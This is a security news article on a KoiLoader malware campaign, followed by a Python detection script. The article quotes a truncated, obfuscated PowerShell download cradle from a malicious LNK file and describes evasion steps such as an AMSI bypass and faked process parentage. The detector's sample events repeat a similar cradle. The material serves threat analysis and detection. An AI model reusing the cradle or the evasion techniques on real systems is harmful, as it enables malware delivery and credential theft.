Cybersecurity researchers have identified a sophisticated malware campaign leveraging a new variant of KoiLoader, a modular payload delivery system notorious for distributing information stealers such as Koi Stealer. This updated strain employs PowerShell scripts embedded within Windows shortcut (LNK) files to bypass traditional detection mechanisms, demonstrating a concerning evolution in attack methodologies. eSentire’s Threat Response Unit (TRU) first detected the intrusion during routine threat-hunting operations, observing a multi-stage deployment chain designed to evade endpoint detection and response (EDR) tools.

The campaign’s initial access vector is phishing emails impersonating financial institutions, luring victims with ZIP archives containing malicious LNK files labeled as bank statements. These files exploit a known Windows vulnerability (ZDI-CAN-25373) to hide command-line arguments, masking their malicious intent during superficial inspection. The infection chain begins when a victim interacts with the LNK file chase_statement_march.lnk, which triggers the following truncated PowerShell command:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $pdw = $env:programdata + '\' + ('g1siy9wuiiyxnk.js i7z1x5npc'); $getf='Dow'+'nl'+'oadF'+'ile'; $w2al9zb7lb86ccs0 = New-Object Net.WebClient; $wscs = 'wscript '; $w2al9zb7lb86ccs0.$getf(' ;.]it/.../hemigastrectomySDur.php', 'g1siy9wuiiyxnk.js');

The PowerShell command embedded in the LNK file downloads two JScript payloads (g1siy9wuiiyxnk.js and i7z1x5npc.js) to establish persistence and execute further malicious activity. The first JScript (g1siy9wuiiyxnk.js) deletes the initial scheduled task and relaunches the payload via wscript.exe under svchost.exe to simulate benign activity. eSentire analysts noted that this technique disrupts process ancestry-based detection, because security tools typically associate wscript.exe with user-initiated actions rather than system services. The secondary script (i7z1x5npc.js) retrieves the victim’s machine GUID from the registry (HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid), generates a unique filename from it, and fetches two PowerShell scripts: one to disable AMSI (boomier10qD0.php) and another (nephralgiaMsy.ps1) to load KoiLoader into memory (Figure 5).

Notably, the threat actors employed scheduled tasks to maintain execution continuity while altering process parentage to mimic legitimate system activity. Subsequent command-and-control (C2) communications use encrypted HTTP POST requests to exfiltrate victim data, including operating system details, usernames, and domain information. The malware’s impact extends beyond the initial compromise, as KoiLoader facilitates the delivery of Koi Stealer, a C#-based information stealer capable of harvesting credentials, cryptocurrency wallets, and sensitive documents.

This multi-stage approach highlights adversaries’ increasing sophistication in blending LOLBin abuse, script obfuscation, and encryption to evade detection, and the campaign shows the growing reliance on living-off-the-land binaries (LOLBins) and script-based attacks to circumvent security controls. Organizations are advised to disable wscript.exe via AppLocker, monitor PowerShell execution logs, and deploy behavior-based EDR solutions to mitigate such threats.
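The two detection opportunities the article describes, a script host (wscript.exe) spawned under svchost.exe and a PowerShell command line that hides its download cradle behind string concatenation such as 'Dow'+'nl'+'oadF'+'ile', can both be checked from process-creation telemetry. The Python below is an added example written for this page, not code from eSentire or the article; it runs over a handful of constructed events modelled on Sysmon Event ID 1 fields (Image, ParentImage, CommandLine), collapses quoted-string concatenation so that split keywords become visible, and returns the rule names that fired per event. The hostnames and file names in the sample events are placeholders, not indicators from the campaign.

```python
import re

# Constructed sample process-creation events (hypothetical, shaped like Sysmon Event ID 1).
# Event 0 mirrors the concatenated-string download cradle from the LNK; event 1 mirrors
# wscript.exe relaunched under svchost.exe. Events 2 and 3 are benign controls.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": ("powershell.exe -command $getf='Dow'+'nl'+'oadF'+'ile'; "
                     "$w = New-Object Net.WebClient; $wscs = 'wscript '; "
                     "$w.$getf('http://example.invalid/x.php', 'a.js')")},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"wscript C:\ProgramData\a.js"},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"wscript C:\Scripts\logon.js"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -command Get-Process"},
]

# Matches two adjacent single-quoted fragments joined with '+', e.g. 'Dow'+'nl'.
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Parents under which an interactive script host is anomalous (the article's ancestry trick).
ANOMALOUS_HOST_PARENTS = {"svchost.exe"}
# Substrings that, once concatenation is collapsed, reveal a download cradle.
DOWNLOAD_INDICATORS = ("net.webclient", "downloadfile", "downloadstring", "invoke-webrequest")


def collapse_concat(cmd: str) -> str:
    """Repeatedly join 'a'+'b' into 'ab' until the command line stops changing."""
    prev = None
    while prev != cmd:
        prev = cmd
        cmd = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", cmd)
    return cmd


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_event(ev: dict) -> list:
    """Return the names of the detection rules that fire for one event."""
    findings = []
    image = basename(ev["Image"])
    parent = basename(ev["ParentImage"])
    cmd = ev.get("CommandLine", "")

    # Rule 1: script host whose parent is a service host rather than a user shell.
    if image in SCRIPT_HOSTS and parent in ANOMALOUS_HOST_PARENTS:
        findings.append("script_host_under_svchost")

    # Rules 2-4 apply to PowerShell command lines only.
    if image == "powershell.exe":
        if CONCAT_RE.search(cmd):
            findings.append("string_concat_obfuscation")
        flat = collapse_concat(cmd).lower()
        if any(ind in flat for ind in DOWNLOAD_INDICATORS):
            findings.append("download_cradle")
        if "wscript" in flat or "cscript" in flat:
            findings.append("script_host_launch")
    return findings


def scan(events: list) -> dict:
    """Map event index -> findings for every event that triggered at least one rule."""
    results = {}
    for idx, ev in enumerate(events):
        hits = analyse_event(ev)
        if hits:
            results[idx] = hits
    return results


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(hits)}")
```

The concatenation collapse is deliberately simple (single-quoted fragments joined with '+'); real command lines also use double quotes, format operators and variable indirection, so in production this logic belongs alongside PowerShell script-block logging (Event ID 4104), which records the de-obfuscated script as it actually executed, rather than replacing it.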
This Cyber News was published on cybersecuritynews.com. Publication date: Wed, 02 Apr 2025 05:15:05 +0000